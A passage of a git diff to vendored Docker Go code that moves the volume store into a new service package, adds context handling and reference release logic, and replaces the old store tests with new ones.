vv, nil + } } // Since there isn't a specified driver name, let's see if any of the existing drivers have this volume name if driverName == "" { - v, _ := s.getVolume(name) + v, _ = s.getVolume(ctx, name, "") if v != nil { return v, nil } } - vd, err := volumedrivers.CreateDriver(driverName) - + if driverName == "" { + driverName = volume.DefaultDriverName + } + vd, err := s.drivers.CreateDriver(driverName) if err != nil { return nil, &OpErr{Op: "create", Name: name, Err: err} } logrus.Debugf("Registering new volume reference: driver %q, name %q", vd.Name(), name) - - if v, _ := vd.Get(name); v != nil { - return v, nil - } - v, err = vd.Create(name, opts) - if err != nil { - return nil, err + if v, _ = vd.Get(name); v == nil { + v, err = vd.Create(name, opts) + if err != nil { + if _, err := s.drivers.ReleaseDriver(driverName); err != nil { + logrus.WithError(err).WithField("driver", driverName).Error("Error releasing reference to volume driver") + } + return nil, err + } } + s.globalLock.Lock() s.labels[name] = labels s.options[name] = opts + s.refs[name] = make(map[string]struct{}) s.globalLock.Unlock() metadata := volumeMetadata{ @@ -405,58 +623,57 @@ func (s *VolumeStore) create(name, driverName string, opts, labels map[string]st return volumeWrapper{v, labels, vd.Scope(), opts}, nil } -// GetWithRef gets a volume with the given name from the passed in driver and stores the ref -// This is just like Get(), but we store the reference while holding the lock. -// This makes sure there are no races between checking for the existence of a volume and adding a reference for it -func (s *VolumeStore) GetWithRef(name, driverName, ref string) (volume.Volume, error) { - name = normaliseVolumeName(name) - s.locks.Lock(name) - defer s.locks.Unlock(name) - - vd, err := volumedrivers.GetDriver(driverName) - if err != nil { - return nil, &OpErr{Err: err, Name: name, Op: "get"} - } - - v, err := vd.Get(name) - if err != nil { - return nil, &OpErr{Err: err, Name: name, Op: "get"} - } - - s.setNamed(v, ref) - - s.globalLock.RLock() - defer s.globalLock.RUnlock() - return volumeWrapper{v, s.labels[name], vd.Scope(), s.options[name]}, nil -} - // Get looks if a volume with the given name exists and returns it if so -func (s *VolumeStore) Get(name string) (volume.Volume, error) { - name = normaliseVolumeName(name) +func (s *VolumeStore) Get(ctx context.Context, name string, getOptions ...opts.GetOption) (volume.Volume, error) { + var cfg opts.GetConfig + for _, o := range getOptions { + o(&cfg) + } + name = normalizeVolumeName(name) s.locks.Lock(name) defer s.locks.Unlock(name) - v, err := s.getVolume(name) + v, err := s.getVolume(ctx, name, cfg.Driver) if err != nil { return nil, &OpErr{Err: err, Name: name, Op: "get"} } - s.setNamed(v, "") + if cfg.Driver != "" && v.DriverName() != cfg.Driver { + return nil, &OpErr{Name: name, Op: "get", Err: errdefs.Conflict(errors.New("found volume driver does not match passed in driver"))} + } + s.setNamed(v, cfg.Reference) return v, nil } // getVolume requests the volume, if the driver info is stored it just accesses that driver, // if the driver is unknown it probes all drivers until it finds the first volume with that name. // it is expected that callers of this function hold any necessary locks -func (s *VolumeStore) getVolume(name string) (volume.Volume, error) { +func (s *VolumeStore) getVolume(ctx context.Context, name, driverName string) (volume.Volume, error) { var meta volumeMetadata meta, err := s.getMeta(name) if err != nil { return nil, err } - driverName := meta.Driver + if driverName != "" { + if meta.Driver == "" { + meta.Driver = driverName + } + if driverName != meta.Driver { + return nil, errdefs.Conflict(errors.New("provided volume driver does not match stored driver")) + } + } + + if driverName == "" { + driverName = meta.Driver + } if driverName == "" { s.globalLock.RLock() + select { + case <-ctx.Done(): + s.globalLock.RUnlock() + return nil, ctx.Err() + default: + } v, exists := s.names[name] s.globalLock.RUnlock() if exists { @@ -468,17 +685,17 @@ func (s *VolumeStore) getVolume(name string) (volume.Volume, error) { } if meta.Driver != "" { - vol, err := lookupVolume(meta.Driver, name) + vol, err := lookupVolume(ctx, s.drivers, meta.Driver, name) if err != nil { return nil, err } if vol == nil { - s.Purge(name) + s.purge(ctx, name) return nil, errNoSuchVolume } var scope string - vd, err := volumedrivers.GetDriver(meta.Driver) + vd, err := s.drivers.GetDriver(meta.Driver) if err == nil { scope = vd.Scope() } @@ -486,12 +703,17 @@ func (s *VolumeStore) getVolume(name string) (volume.Volume, error) { } logrus.Debugf("Probing all drivers for volume with name: %s", name) - drivers, err := volumedrivers.GetAllDrivers() + drivers, err := s.drivers.GetAllDrivers() if err != nil { return nil, err } for _, d := range drivers { + select { + case <-ctx.Done(): + return nil, ctx.Err() + default: + } v, err := d.Get(name) if err != nil || v == nil { continue @@ -510,8 +732,12 @@ func (s *VolumeStore) getVolume(name string) (volume.Volume, error) { // If the driver returns an error that is not communication related the // error is logged but not returned. // If the volume is not found it will return `nil, nil`` -func lookupVolume(driverName, volumeName string) (volume.Volume, error) { - vd, err := volumedrivers.GetDriver(driverName) +// TODO(@cpuguy83): plumb through the context to lower level components +func lookupVolume(ctx context.Context, store *drivers.Store, driverName, volumeName string) (volume.Volume, error) { + if driverName == "" { + driverName = volume.DefaultDriverName + } + vd, err := store.GetDriver(driverName) if err != nil { return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", volumeName, driverName) } @@ -519,119 +745,102 @@ func lookupVolume(driverName, volumeName string) (volume.Volume, error) { if err != nil { err = errors.Cause(err) if _, ok := err.(net.Error); ok { - return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", v.Name(), v.DriverName()) + if v != nil { + volumeName = v.Name() + driverName = v.DriverName() + } + return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", volumeName, driverName) } // At this point, the error could be anything from the driver, such as "no such volume" // Let's not check an error here, and instead check if the driver returned a volume - logrus.WithError(err).WithField("driver", driverName).WithField("volume", volumeName).Warnf("Error while looking up volume") + logrus.WithError(err).WithField("driver", driverName).WithField("volume", volumeName).Debug("Error while looking up volume") } return v, nil } // Remove removes the requested volume. A volume is not removed if it has any refs -func (s *VolumeStore) Remove(v volume.Volume) error { - name := normaliseVolumeName(v.Name()) +func (s *VolumeStore) Remove(ctx context.Context, v volume.Volume, rmOpts ...opts.RemoveOption) error { + var cfg opts.RemoveConfig + for _, o := range rmOpts { + o(&cfg) + } + + name := v.Name() s.locks.Lock(name) defer s.locks.Unlock(name) - refs := s.getRefs(name) - if len(refs) > 0 { - return &OpErr{Err: errVolumeInUse, Name: v.Name(), Op: "remove", Refs: refs} + select { + case <-ctx.Done(): + return ctx.Err() + default: + } + + if s.hasRef(name) { + return &OpErr{Err: errVolumeInUse, Name: name, Op: "remove", Refs: s.getRefs(name)} } - vd, err := volumedrivers.GetDriver(v.DriverName()) + v, err := s.getVolume(ctx, name, v.DriverName()) if err != nil { - return &OpErr{Err: err, Name: vd.Name(), Op: "remove"} + return err + } + + vd, err := s.drivers.GetDriver(v.DriverName()) + if err != nil { + return &OpErr{Err: err, Name: v.DriverName(), Op: "remove"} } logrus.Debugf("Removing volume reference: driver %s, name %s", v.DriverName(), name) vol := unwrapVolume(v) - if err := vd.Remove(vol); err != nil { - return &OpErr{Err: err, Name: name, Op: "remove"} + + err = vd.Remove(vol) + if err != nil { + err = &OpErr{Err: err, Name: name, Op: "remove"} } - s.Purge(name) - return nil + if err == nil || cfg.PurgeOnError { + if e := s.purge(ctx, name); e != nil && err == nil { + err = e + } + } + return err } -// Dereference removes the specified reference to the volume -func (s *VolumeStore) Dereference(v volume.Volume, ref string) { - s.locks.Lock(v.Name()) - defer s.locks.Unlock(v.Name()) +// Release releases the specified reference to the volume +func (s *VolumeStore) Release(ctx context.Context, name string, ref string) error { + s.locks.Lock(name) + defer s.locks.Unlock(name) + select { + case <-ctx.Done(): + return ctx.Err() + default: + } s.globalLock.Lock() defer s.globalLock.Unlock() - var refs []string - for _, r := range s.refs[v.Name()] { - if r != ref { - refs = append(refs, r) - } + select { + case <-ctx.Done(): + return ctx.Err() + default: } - s.refs[v.Name()] = refs -} - -// Refs gets the current list of refs for the given volume -func (s *VolumeStore) Refs(v volume.Volume) []string { - s.locks.Lock(v.Name()) - defer s.locks.Unlock(v.Name()) - - refs := s.getRefs(v.Name()) - refsOut := make([]string, len(refs)) - copy(refsOut, refs) - return refsOut -} -// FilterByDriver returns the available volumes filtered by driver name -func (s *VolumeStore) FilterByDriver(name string) ([]volume.Volume, error) { - vd, err := volumedrivers.GetDriver(name) - if err != nil { - return nil, &OpErr{Err: err, Name: name, Op: "list"} - } - ls, err := vd.List() - if err != nil { - return nil, &OpErr{Err: err, Name: name, Op: "list"} + if s.refs[name] != nil { + delete(s.refs[name], ref) } - for i, v := range ls { - options := map[string]string{} - s.globalLock.RLock() - for key, value := range s.options[v.Name()] { - options[key] = value - } - ls[i] = volumeWrapper{v, s.labels[v.Name()], vd.Scope(), options} - s.globalLock.RUnlock() - } - return ls, nil + return nil } -// FilterByUsed returns the available volumes filtered by if they are in use or not. -// `used=true` returns only volumes that are being used, while `used=false` returns -// only volumes that are not being used. -func (s *VolumeStore) FilterByUsed(vols []volume.Volume, used bool) []volume.Volume { - return s.filter(vols, func(v volume.Volume) bool { - s.locks.Lock(v.Name()) - l := len(s.getRefs(v.Name())) - s.locks.Unlock(v.Name()) - if (used && l > 0) || (!used && l == 0) { - return true - } - return false - }) -} +// CountReferences gives a count of all references for a given volume. +func (s *VolumeStore) CountReferences(v volume.Volume) int { + name := normalizeVolumeName(v.Name()) -// filterFunc defines a function to allow filter volumes in the store -type filterFunc func(vol volume.Volume) bool + s.locks.Lock(name) + defer s.locks.Unlock(name) + s.globalLock.Lock() + defer s.globalLock.Unlock() -// filter returns the available volumes filtered by a filterFunc function -func (s *VolumeStore) filter(vols []volume.Volume, f filterFunc) []volume.Volume { - var ls []volume.Volume - for _, v := range vols { - if f(v) { - ls = append(ls, v) - } - } - return ls + return len(s.refs[name]) } func unwrapVolume(v volume.Volume) volume.Volume { diff --git a/vendor/github.com/docker/docker/volume/service/store_test.go b/vendor/github.com/docker/docker/volume/service/store_test.go new file mode 100644 index 0000000000..53345f318b --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/store_test.go @@ -0,0 +1,421 @@ +package service // import "github.com/docker/docker/volume/service" + +import ( + "context" + "errors" + "fmt" + "io/ioutil" + "net" + "os" + "strings" + "testing" + + "github.com/docker/docker/volume" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/service/opts" + volumetestutils "github.com/docker/docker/volume/testutils" + "github.com/google/go-cmp/cmp" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestCreate(t *testing.T) { + t.Parallel() + + s, cleanup := setupTest(t) + defer cleanup() + s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + + ctx := context.Background() + v, err := s.Create(ctx, "fake1", "fake") + if err != nil { + t.Fatal(err) + } + if v.Name() != "fake1" { + t.Fatalf("Expected fake1 volume, got %v", v) + } + if l, _, _ := s.Find(ctx, nil); len(l) != 1 { + t.Fatalf("Expected 1 volume in the store, got %v: %v", len(l), l) + } + + if _, err := s.Create(ctx, "none", "none"); err == nil { + t.Fatalf("Expected unknown driver error, got nil") + } + + _, err = s.Create(ctx, "fakeerror", "fake", opts.WithCreateOptions(map[string]string{"error": "create error"})) + expected := &OpErr{Op: "create", Name: "fakeerror", Err: errors.New("create error")} + if err != nil && err.Error() != expected.Error() { + t.Fatalf("Expected create fakeError: create error, got %v", err) + } +} + +func TestRemove(t *testing.T) { + t.Parallel() + + s, cleanup := setupTest(t) + defer cleanup() + + s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + s.drivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") + + ctx := context.Background() + + // doing string compare here since this error comes directly from the driver + expected := "no such volume" + var v volume.Volume = volumetestutils.NoopVolume{} + if err := s.Remove(ctx, v); err == nil || !strings.Contains(err.Error(), expected) { + t.Fatalf("Expected error %q, got %v", expected, err) + } + + v, err := s.Create(ctx, "fake1", "fake", opts.WithCreateReference("fake")) + if err != nil { + t.Fatal(err) + } + + if err := s.Remove(ctx, v); !IsInUse(err) { + t.Fatalf("Expected ErrVolumeInUse error, got %v", err) + } + s.Release(ctx, v.Name(), "fake") + if err := s.Remove(ctx, v); err != nil { + t.Fatal(err) + } + if l, _, _ := s.Find(ctx, nil); len(l) != 0 { + t.Fatalf("Expected 0 volumes in the store, got %v, %v", len(l), l) + } +} + +func TestList(t *testing.T) { + t.Parallel() + + dir, err := ioutil.TempDir("", "test-list") + assert.NilError(t, err) + defer os.RemoveAll(dir) + + drivers := volumedrivers.NewStore(nil) + drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + drivers.Register(volumetestutils.NewFakeDriver("fake2"), "fake2") + + s, err := NewStore(dir, drivers) + assert.NilError(t, err) + + ctx := context.Background() + if _, err := s.Create(ctx, "test", "fake"); err != nil { + t.Fatal(err) + } + if _, err := s.Create(ctx, "test2", "fake2"); err != nil { + t.Fatal(err) + } + + ls, _, err := s.Find(ctx, nil) + if err != nil { + t.Fatal(err) + } + if len(ls) != 2 { + t.Fatalf("expected 2 volumes, got: %d", len(ls)) + } + if err := s.Shutdown(); err != nil { + t.Fatal(err) + } + + // and again with a new store + s, err = NewStore(dir, drivers) + if err != nil { + t.Fatal(err) + } + ls, _, err = s.Find(ctx, nil) + if err != nil { + t.Fatal(err) + } + if len(ls) != 2 { + t.Fatalf("expected 2 volumes, got: %d", len(ls)) + } +} + +func TestFindByDriver(t *testing.T) { + t.Parallel() + s, cleanup := setupTest(t) + defer cleanup() + + assert.Assert(t, s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")) + assert.Assert(t, s.drivers.Register(volumetestutils.NewFakeDriver("noop"), "noop")) + + ctx := context.Background() + _, err := s.Create(ctx, "fake1", "fake") + assert.NilError(t, err) + + _, err = s.Create(ctx, "fake2", "fake") + assert.NilError(t, err) + + _, err = s.Create(ctx, "fake3", "noop") + assert.NilError(t, err) + + l, _, err := s.Find(ctx, ByDriver("fake")) + assert.NilError(t, err) + assert.Equal(t, len(l), 2) + + l, _, err = s.Find(ctx, ByDriver("noop")) + assert.NilError(t, err) + assert.Equal(t, len(l), 1) + + l, _, err = s.Find(ctx, ByDriver("nosuchdriver")) + assert.NilError(t, err) + assert.Equal(t, len(l), 0) +} + +func TestFindByReferenced(t *testing.T) { + t.Parallel() + s, cleanup := setupTest(t) + defer cleanup() + + s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + s.drivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") + + ctx := context.Background() + if _, err := s.Create(ctx, "fake1", "fake", opts.WithCreateReference("volReference")); err != nil { + t.Fatal(err) + } + if _, err := s.Create(ctx, "fake2", "fake"); err != nil { + t.Fatal(err) + } + + dangling, _, err := s.Find(ctx, ByReferenced(false)) + assert.Assert(t, err) + assert.Assert(t, len(dangling) == 1) + assert.Check(t, dangling[0].Name() == "fake2") + + used, _, err := s.Find(ctx, ByReferenced(true)) + assert.Assert(t, err) + assert.Assert(t, len(used) == 1) + assert.Check(t, used[0].Name() == "fake1") +} + +func TestDerefMultipleOfSameRef(t *testing.T) { + t.Parallel() + s, cleanup := setupTest(t) + defer cleanup() + s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") + + ctx := context.Background() + v, err := s.Create(ctx, "fake1", "fake", opts.WithCreateReference("volReference")) + if err != nil { + t.Fatal(err) + } + + if _, err := s.Get(ctx, "fake1", opts.WithGetDriver("fake"), opts.WithGetReference("volReference")); err != nil { + t.Fatal(err) + } + + s.Release(ctx, v.Name(), "volReference") + if err := s.Remove(ctx, v); err != nil { + t.Fatal(err) + } +} + +func TestCreateKeepOptsLabelsWhenExistsRemotely(t *testing.T) { + t.Parallel() + s, cleanup := setupTest(t) + defer cleanup() + + vd := volumetestutils.NewFakeDriver("fake") + s.drivers.Register(vd, "fake") + + // Create a volume in the driver directly + if _, err := vd.Create("foo", nil); err != nil { + t.Fatal(err) + } + + ctx := context.Background() + v, err := s.Create(ctx, "foo", "fake", opts.WithCreateLabels(map[string]string{"hello": "world"})) + if err != nil { + t.Fatal(err) + } + + switch dv := v.(type) { + case volume.DetailedVolume: + if dv.Labels()["hello"] != "world" { + t.Fatalf("labels don't match") + } + default: + t.Fatalf("got unexpected type: %T", v) + } +} + +func TestDefererencePluginOnCreateError(t *testing.T) { + t.Parallel() + + var ( + l net.Listener + err error + ) + + for i := 32768; l == nil && i < 40000; i++ { + l, err = net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", i)) + } + if l == nil { + t.Fatalf("could not create listener: %v", err) + } + defer l.Close() + + s, cleanup := setupTest(t) + defer cleanup() + + d := volumetestutils.NewFakeDriver("TestDefererencePluginOnCreateError") + p, err := volumetestutils.MakeFakePlugin(d, l) + if err != nil { + t.Fatal(err) + } + + pg := volumetestutils.NewFakePluginGetter(p) + s.drivers = volumedrivers.NewStore(pg) + + ctx := context.Background() + // create a good volume so we have a plugin reference + _, err = s.Create(ctx, "fake1", d.Name()) + if err != nil { + t.Fatal(err) + } + + // Now create another one expecting an error + _, err = s.Create(ctx, "fake2", d.Name(), opts.WithCreateOptions(map[string]string{"error": "some error"})) + if err == nil || !strings.Contains(err.Error(), "some error") { + t.Fatalf("expected an error on create: %v", err) + } + + // There should be only 1 plugin reference + if refs := volumetestutils.FakeRefs(p); refs != 1 { + t.Fatalf("expected 1 plugin reference, got: %d", refs) + } +} + +func TestRefDerefRemove(t *testing.T) { + t.Parallel() + + driverName := "test-ref-deref-remove" + s, cleanup := setupTest(t) + defer cleanup() + s.drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName) + + ctx := context.Background() + v, err := s.Create(ctx, "test", driverName, opts.WithCreateReference("test-ref")) + assert.NilError(t, err) + + err = s.Remove(ctx, v) + assert.Assert(t, is.ErrorContains(err, "")) + assert.Equal(t, errVolumeInUse, err.(*OpErr).Err) + + s.Release(ctx, v.Name(), "test-ref") + err = s.Remove(ctx, v) + assert.NilError(t, err) +} + +func TestGet(t *testing.T) { + t.Parallel() + + driverName := "test-get" + s, cleanup := setupTest(t) + defer cleanup() + s.drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName) + + ctx := context.Background() + _, err := s.Get(ctx, "not-exist") + assert.Assert(t, is.ErrorContains(err, "")) + assert.Equal(t, errNoSuchVolume, err.(*OpErr).Err) + + v1, err := s.Create(ctx, "test", driverName, opts.WithCreateLabels(map[string]string{"a": "1"})) + assert.NilError(t, err) + + v2, err := s.Get(ctx, "test") + assert.NilError(t, err) + assert.DeepEqual(t, v1, v2, cmpVolume) + + dv := v2.(volume.DetailedVolume) + assert.Equal(t, "1", dv.Labels()["a"]) + + err = s.Remove(ctx, v1) + assert.NilError(t, err) +} + +func TestGetWithReference(t *testing.T) { + t.Parallel() + + driverName := "test-get-with-ref" + s, cleanup := setupTest(t) + defer cleanup() + s.drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName) + + ctx := context.Background() + _, err := s.Get(ctx, "not-exist", opts.WithGetDriver(driverName), opts.WithGetReference("test-ref")) + assert.Assert(t, is.ErrorContains(err, "")) + + v1, err := s.Create(ctx, "test", driverName, opts.WithCreateLabels(map[string]string{"a": "1"})) + assert.NilError(t, err) + + v2, err := s.Get(ctx, "test", opts.WithGetDriver(driverName), opts.WithGetReference("test-ref")) + assert.NilError(t, err) + assert.DeepEqual(t, v1, v2, cmpVolume) + + err = s.Remove(ctx, v2) + assert.Assert(t, is.ErrorContains(err, "")) + assert.Equal(t, errVolumeInUse, err.(*OpErr).Err) + + s.Release(ctx, v2.Name(), "test-ref") + err = s.Remove(ctx, v2) + assert.NilError(t, err) +} + +var cmpVolume = cmp.AllowUnexported(volumetestutils.FakeVolume{}, volumeWrapper{}) + +func setupTest(t *testing.T) (*VolumeStore, func()) { + t.Helper() + + dirName := strings.Replace(t.Name(), string(os.PathSeparator), "_", -1) + dir, err := ioutil.TempDir("", dirName) + assert.NilError(t, err) + + cleanup := func() { + t.Helper() + err := os.RemoveAll(dir) + assert.Check(t, err) + } + + s, err := NewStore(dir, volumedrivers.NewStore(nil)) + assert.Check(t, err) + return s, func() { + s.Shutdown() + cleanup() + } +} + +func TestFilterFunc(t *testing.T) { + testDriver := volumetestutils.NewFakeDriver("test") + testVolume, err := testDriver.Create("test", nil) + assert.NilError(t, err) + testVolume2, err := testDriver.Create("test2", nil) + assert.NilError(t, err) + testVolume3, err := testDriver.Create("test3", nil) + assert.NilError(t, err) + + for _, test := range []struct { + vols []volume.Volume + fn filterFunc + desc string + expect []volume.Volume + }{ + {desc: "test nil list", vols: nil, expect: nil, fn: func(volume.Volume) bool { return true }}, + {desc: "test empty list", vols: []volume.Volume{}, expect: []volume.Volume{}, fn: func(volume.Volume) bool { return true }}, + {desc: "test filter non-empty to empty", vols: []volume.Volume{testVolume}, expect: []volume.Volume{}, fn: func(volume.Volume) bool { return false }}, + {desc: "test nothing to fitler non-empty list", vols: []volume.Volume{testVolume}, expect: []volume.Volume{testVolume}, fn: func(volume.Volume) bool { return true }}, + {desc: "test filter some", vols: []volume.Volume{testVolume, testVolume2}, expect: []volume.Volume{testVolume}, fn: func(v volume.Volume) bool { return v.Name() == testVolume.Name() }}, + {desc: "test filter middle", vols: []volume.Volume{testVolume, testVolume2, testVolume3}, expect: []volume.Volume{testVolume, testVolume3}, fn: func(v volume.Volume) bool { return v.Name() != testVolume2.Name() }}, + {desc: "test filter middle and last", vols: []volume.Volume{testVolume, testVolume2, testVolume3}, expect: []volume.Volume{testVolume}, fn: func(v volume.Volume) bool { return v.Name() != testVolume2.Name() && v.Name() != testVolume3.Name() }}, + {desc: "test filter first and last", vols: []volume.Volume{testVolume, testVolume2, testVolume3}, expect: []volume.Volume{testVolume2}, fn: func(v volume.Volume) bool { return v.Name() != testVolume.Name() && v.Name() != testVolume3.Name() }}, + } { + t.Run(test.desc, func(t *testing.T) { + test := test + t.Parallel() + + filter(&test.vols, test.fn) + assert.DeepEqual(t, test.vols, test.expect, cmpVolume) + }) + } +} diff --git a/vendor/github.com/docker/docker/volume/service/store_unix.go b/vendor/github.com/docker/docker/volume/service/store_unix.go new file mode 100644 index 0000000000..4ccc4b9999 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/service/store_unix.go @@ -0,0 +1,9 @@ +// +build linux freebsd darwin + +package service // import "github.com/docker/docker/volume/service" + +// normalizeVolumeName is a platform specific function to normalize the name +// of a volume. This is a no-op on Unix-like platforms +func normalizeVolumeName(name string) string { + return name +} diff --git a/vendor/github.com/docker/docker/volume/store/store_windows.go b/vendor/github.com/docker/docker/volume/service/store_windows.go similarity index 59% rename from vendor/github.com/docker/docker/volume/store/store_windows.go rename to vendor/github.com/docker/docker/volume/service/store_windows.go index 8601cdd5cf..bd46a6893e 100644 --- a/vendor/github.com/docker/docker/volume/store/store_windows.go +++ b/vendor/github.com/docker/docker/volume/service/store_windows.go @@ -1,12 +1,12 @@ -package store +package service // import "github.com/docker/docker/volume/service" import "strings" -// normaliseVolumeName is a platform specific function to normalise the name +// normalizeVolumeName is a platform specific function to normalize the name // of a volume. On Windows, as NTFS is case insensitive, under // c:\ProgramData\Docker\Volumes\, the folders John and john would be synonymous. // Hence we can't allow the volume "John" and "john" to be created as separate // volumes. -func normaliseVolumeName(name string) string { +func normalizeVolumeName(name string) string { return strings.ToLower(name) } diff --git a/vendor/github.com/docker/docker/volume/store/store_test.go b/vendor/github.com/docker/docker/volume/store/store_test.go deleted file mode 100644 index b52f720ca1..0000000000 --- a/vendor/github.com/docker/docker/volume/store/store_test.go +++ /dev/null @@ -1,234 +0,0 @@ -package store - -import ( - "errors" - "io/ioutil" - "os" - "strings" - "testing" - - "github.com/docker/docker/volume/drivers" - volumetestutils "github.com/docker/docker/volume/testutils" -) - -func TestCreate(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - defer volumedrivers.Unregister("fake") - dir, err := ioutil.TempDir("", "test-create") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(dir) - - s, err := New(dir) - if err != nil { - t.Fatal(err) - } - v, err := s.Create("fake1", "fake", nil, nil) - if err != nil { - t.Fatal(err) - } - if v.Name() != "fake1" { - t.Fatalf("Expected fake1 volume, got %v", v) - } - if l, _, _ := s.List(); len(l) != 1 { - t.Fatalf("Expected 1 volume in the store, got %v: %v", len(l), l) - } - - if _, err := s.Create("none", "none", nil, nil); err == nil { - t.Fatalf("Expected unknown driver error, got nil") - } - - _, err = s.Create("fakeerror", "fake", map[string]string{"error": "create error"}, nil) - expected := &OpErr{Op: "create", Name: "fakeerror", Err: errors.New("create error")} - if err != nil && err.Error() != expected.Error() { - t.Fatalf("Expected create fakeError: create error, got %v", err) - } -} - -func TestRemove(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") - defer volumedrivers.Unregister("fake") - defer volumedrivers.Unregister("noop") - dir, err := ioutil.TempDir("", "test-remove") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(dir) - s, err := New(dir) - if err != nil { - t.Fatal(err) - } - - // doing string compare here since this error comes directly from the driver - expected := "no such volume" - if err := s.Remove(volumetestutils.NoopVolume{}); err == nil || !strings.Contains(err.Error(), expected) { - t.Fatalf("Expected error %q, got %v", expected, err) - } - - v, err := s.CreateWithRef("fake1", "fake", "fake", nil, nil) - if err != nil { - t.Fatal(err) - } - - if err := s.Remove(v); !IsInUse(err) { - t.Fatalf("Expected ErrVolumeInUse error, got %v", err) - } - s.Dereference(v, "fake") - if err := s.Remove(v); err != nil { - t.Fatal(err) - } - if l, _, _ := s.List(); len(l) != 0 { - t.Fatalf("Expected 0 volumes in the store, got %v, %v", len(l), l) - } -} - -func TestList(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - volumedrivers.Register(volumetestutils.NewFakeDriver("fake2"), "fake2") - defer volumedrivers.Unregister("fake") - defer volumedrivers.Unregister("fake2") - dir, err := ioutil.TempDir("", "test-list") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(dir) - - s, err := New(dir) - if err != nil { - t.Fatal(err) - } - if _, err := s.Create("test", "fake", nil, nil); err != nil { - t.Fatal(err) - } - if _, err := s.Create("test2", "fake2", nil, nil); err != nil { - t.Fatal(err) - } - - ls, _, err := s.List() - if err != nil { - t.Fatal(err) - } - if len(ls) != 2 { - t.Fatalf("expected 2 volumes, got: %d", len(ls)) - } - if err := s.Shutdown(); err != nil { - t.Fatal(err) - } - - // and again with a new store - s, err = New(dir) - if err != nil { - t.Fatal(err) - } - ls, _, err = s.List() - if err != nil { - t.Fatal(err) - } - if len(ls) != 2 { - t.Fatalf("expected 2 volumes, got: %d", len(ls)) - } -} - -func TestFilterByDriver(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") - defer volumedrivers.Unregister("fake") - defer volumedrivers.Unregister("noop") - dir, err := ioutil.TempDir("", "test-filter-driver") - if err != nil { - t.Fatal(err) - } - s, err := New(dir) - if err != nil { - t.Fatal(err) - } - - if _, err := s.Create("fake1", "fake", nil, nil); err != nil { - t.Fatal(err) - } - if _, err := s.Create("fake2", "fake", nil, nil); err != nil { - t.Fatal(err) - } - if _, err := s.Create("fake3", "noop", nil, nil); err != nil { - t.Fatal(err) - } - - if l, _ := s.FilterByDriver("fake"); len(l) != 2 { - t.Fatalf("Expected 2 volumes, got %v, %v", len(l), l) - } - - if l, _ := s.FilterByDriver("noop"); len(l) != 1 { - t.Fatalf("Expected 1 volume, got %v, %v", len(l), l) - } -} - -func TestFilterByUsed(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop") - dir, err := ioutil.TempDir("", "test-filter-used") - if err != nil { - t.Fatal(err) - } - - s, err := New(dir) - if err != nil { - t.Fatal(err) - } - - if _, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil); err != nil { - t.Fatal(err) - } - if _, err := s.Create("fake2", "fake", nil, nil); err != nil { - t.Fatal(err) - } - - vols, _, err := s.List() - if err != nil { - t.Fatal(err) - } - - dangling := s.FilterByUsed(vols, false) - if len(dangling) != 1 { - t.Fatalf("expected 1 danging volume, got %v", len(dangling)) - } - if dangling[0].Name() != "fake2" { - t.Fatalf("expected danging volume fake2, got %s", dangling[0].Name()) - } - - used := s.FilterByUsed(vols, true) - if len(used) != 1 { - t.Fatalf("expected 1 used volume, got %v", len(used)) - } - if used[0].Name() != "fake1" { - t.Fatalf("expected used volume fake1, got %s", used[0].Name()) - } -} - -func TestDerefMultipleOfSameRef(t *testing.T) { - volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake") - dir, err := ioutil.TempDir("", "test-same-deref") - if err != nil { - t.Fatal(err) - } - - s, err := New(dir) - if err != nil { - t.Fatal(err) - } - - v, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil) - if err != nil { - t.Fatal(err) - } - - if _, err := s.GetWithRef("fake1", "fake", "volReference"); err != nil { - t.Fatal(err) - } - - s.Dereference(v, "volReference") - if err := s.Remove(v); err != nil { - t.Fatal(err) - } -} diff --git a/vendor/github.com/docker/docker/volume/store/store_unix.go b/vendor/github.com/docker/docker/volume/store/store_unix.go deleted file mode 100644 index 8ebc1f20c7..0000000000 --- a/vendor/github.com/docker/docker/volume/store/store_unix.go +++ /dev/null @@ -1,9 +0,0 @@ -// +build linux freebsd solaris - -package store - -// normaliseVolumeName is a platform specific function to normalise the name -// of a volume. This is a no-op on Unix-like platforms -func normaliseVolumeName(name string) string { - return name -} diff --git a/vendor/github.com/docker/docker/volume/testutils/testutils.go b/vendor/github.com/docker/docker/volume/testutils/testutils.go index 2dbac02fdb..5bb38e3f33 100644 --- a/vendor/github.com/docker/docker/volume/testutils/testutils.go +++ b/vendor/github.com/docker/docker/volume/testutils/testutils.go @@ -1,8 +1,15 @@ -package testutils +package testutils // import 